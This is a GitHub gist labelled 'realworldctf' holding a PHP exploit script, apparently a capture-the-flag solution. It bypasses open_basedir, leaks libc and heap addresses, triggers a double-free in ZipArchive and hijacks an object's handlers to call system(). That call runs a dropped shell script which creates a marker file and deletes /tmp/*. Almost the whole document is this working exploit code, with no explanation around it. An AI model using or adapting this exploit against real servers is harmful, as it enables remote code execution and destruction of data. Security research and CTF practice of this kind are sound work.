Created
September 16, 2019 03:16
-
-
Save wupco/29f16a4936a599a243ea3c0f9c414e71 to your computer and use it in GitHub Desktop.
realworldctf
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| function bypass_open_basedir(){ | |
| if(!is_dir('/tmp/ab')){ | |
| mkdir('/tmp/ab'); | |
| } | |
| chdir('/tmp/ab'); | |
| ini_set('open_basedir','..'); | |
| chdir('..'); | |
| chdir('..'); | |
| chdir('..'); | |
| chdir('..'); | |
| ini_set('open_basedir','/'); | |
| } | |
| $zipfile = base64_decode("UEsDBBQAAAAIAO4BEk+01rOsTgEAAPkCAAAFABAAYWEucHlVWAwANgRZXSAoWF31ARQAnVLBTsQgEL3zFRMulFTZbXsxm2z8Ck/rHtgWXAyFCjTGv3dK260eNNGe3vBmHu8x1cH3MAZrzQVMP/iQYJAhKqI3QuSTlcazOFiT7hCMLkOyUdi+Vut0UG+jiolgCUeg2lh12O2sb6W9+phoObLnUet6z0oaxzZp0baHG73TVr5QMkGczk4EKmVQIOBiopzsFSFGw9x3BLYqsQMB/IZgXCqohA8/Bqz8xar+EaqqopygWIqobk1MxZoviyOXB3MH/+IixVN1XkiKEGg5kfwfHuq6BgolzPNOvS+3nM5E+wBXMC5zYrbFBOOz3tIq5DAo1xVXoVzrO1Uw0znJuOjUXI5J3z8wvuSczKI3wcSrN65YRDjRxkn7lHe0bXYJvl4NjJ/2W+x6ir3O8R92dOO3Ra3zzR+e7fvPNMl7TP1FPSjZFRhS2ah+fe+maXDnn1BLAwQUAAAAAAB5GhNPAAAAAAAAAAAAAAAAFgAAAC9BQUFBQUFBQUFBQUFBQUFBQUFBQS9QSwMEFAAAAAAAOBsTTwAAAAAAAAAAAAAAAB4AAAAvQUFBQUFBQUFBQUFBQUFBQUFBQUFCQkJCQkJCQi9QSwMEFAAAAAAAgxsTTwAAAAAAAAAAAAAAABcAAABBQUFBQUFBQUFBQUFBQUFBQUFBQUFBL1BLAwQUAAAAAAD5GxNPAAAAAAAAAAAAAAAAFAAAAEREREREREREREREREREREREREQvUEsDBBQAAAAIAPwoE08tVJ1ADwAAABUAAAABAAAAQbPY2Pb5fz0DgxMUOIMAAFBLAwQUAAAACAD8KBNPLVSdQA8AAAAVAAAAAQAAAEKz2Nj2+X89A4MTFDiDAABQSwECFQMUAAAACADuARJPtNazrE4BAAD5AgAABQAMAAAAAAAAAABApIEAAAAAYWEucHlVWAgANgRZXSAoWF1QSwECFAMUAAAAAAB5GhNPAAAAAAAAAAAAAAAAFgAAAAAAAAAAAAAA/0GBAQAAL0FBQUFBQUFBQUFBQUFBQUFBQUFBL1BLAQIUAxQAAAAAADgbE08AAAAAAAAAAAAAAAAeAAAAAAAAAAAAAAD/QbUBAAAvQUFBQUFBQUFBQUFBQUFBQUFBQUFCQkJCQkJCQi9QSwECFAMUAAAAAACDGxNPAAAAAAAAAAAAAAAAFwAAAAAAAAAAAAAA/0HxAQAAQUFBQUFBQUFBQUFBQUFBQUFBQUFBQS9QSwECFAMUAAAAAAD5GxNPAAAAAAAAAAAAAAAAFAAAAAAAAAAAAAAA/0EmAgAARERERERERERERERERERERERERC9QSwECFAMUAAAACAD8KBNPLVSdQA8AAAAVAAAAAQAAAAAAAAAAAAAAtoFYAgAAQVBLAQIUAxQAAAAIAPwoE08tVJ1ADwAAABUAAAABAAAAAAAAAAAAAAC2gYYCAABCUEsFBgAAAAAHAAcAtAEAALQCAAAAAA=="); | |
| function pack8($addr) { | |
| return pack("LL", $addr & 0xffffffff, $addr >> 32); | |
| } | |
| function getpocpath($len){ | |
| $remain_len = $len - strlen('/tmp/'); | |
| file_put_contents('/tmp/'.str_repeat('A',$remain_len),$zipfile); | |
| return '/tmp/'.str_repeat('A',$remain_len); | |
| } | |
| function leak(){ | |
| $a = file_get_contents('/proc/self/maps'); | |
| $b = explode("\n",$a); | |
| //var_dump($b); | |
| foreach($b as $v){ | |
| if(stripos($v,"libc-2.27.so")!==false && stripos($v,"r-xp")!==false){ | |
| // echo $v; | |
| $libcaddr = explode("-",$v)[0]; | |
| $libcaddr = hexdec('0x'.$libcaddr); | |
| return $libcaddr; | |
| } | |
| } | |
| } | |
| function leak2(){ | |
| $zip_ = new ZipArchive; | |
| $zip_2 = new ZipArchive; | |
| $zip_3 = new ZipArchive; | |
| $paylen = 200; | |
| $pocpath = getpocpath($paylen); | |
| $zip_3->open($pocpath); | |
| //double efree | |
| $zip_->open($pocpath); //emalloc 0 | |
| $zip_->open(str_repeat('A',$paylen)); //efree list: 0 | |
| $zip_->open(str_repeat('D',$paylen)); //efree list: 0->0 | |
| $zip_2->open($pocpath); //emalloc 0 | |
| $zip_->open('aa'); //efree list 0->0 | |
| //$zip_2->filename : addr of 0 | |
| $a = strrev($zip_2->filename); | |
| echo "[*] heap addr: 0x".bin2hex($a)."\n"; | |
| $b = hexdec('0x'.bin2hex($a)); | |
| //recover efree list | |
| $zip_3->addFromString('A',str_repeat('F',$paylen)); | |
| $zip_3->addFromString('B',str_repeat('C',$paylen)); | |
| $zip_3->close(); | |
| return $b; | |
| } | |
| $cmd = "touch /var/tmp/hacker;"; | |
| $bashfile = "#!/bin/bash\n".$cmd."\nrm -r /tmp/*"; | |
| file_put_contents('/tmp/b',$bashfile); | |
| chmod('/tmp/b',0777); | |
| bypass_open_basedir(); | |
| $libcbase = leak(); | |
| $system = pack8($libcbase+0x4f440); | |
| echo "[*] system addr: 0x".bin2hex(strrev($system))."\n"; | |
| $heap_addr = leak2(); | |
| $heap_addr = pack8($heap_addr+0x8dee0); | |
| $zip = new ZipArchive; | |
| $zip2 = new ZipArchive; | |
| $zip3 = new ZipArchive; | |
| $paylen = 159; // size of (zend_obj*)`ZipArchive`; | |
| $pocpath = getpocpath($paylen); | |
| $zip3->open($pocpath); | |
| //double free | |
| $zip->open($pocpath); //emalloc 0 | |
| $zip->open(str_repeat('P',$paylen));//efree list: 0 | |
| $zip->open(str_repeat('D',$paylen));//efree list: 0->0 | |
| sleep(1); | |
| $a = new ZipArchive; //emalloc 0 | |
| /* | |
| Overwrite $a(ZipArchive) | |
| zobj->handlers->get_properties_for(zobj, purpose) | |
| ^ ^ ^ | |
| | | |________ | |
| $heap_addr system addr | | |
| ...aaa;/tmp/b;HHH... | |
| system("...aaa;/tmp/b;HHH..."); | |
| */ | |
| $zip3->addFromString("B",str_repeat('a','48').';/tmp/b;'.'HHHHHHHH'.$heap_addr.str_repeat('b',$paylen-72)); | |
| $c = str_repeat($system,99999); //heap spray | |
| var_dump($a);//trigger zend_get_properties_for | |
| echo "[*] exploit OK"; |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment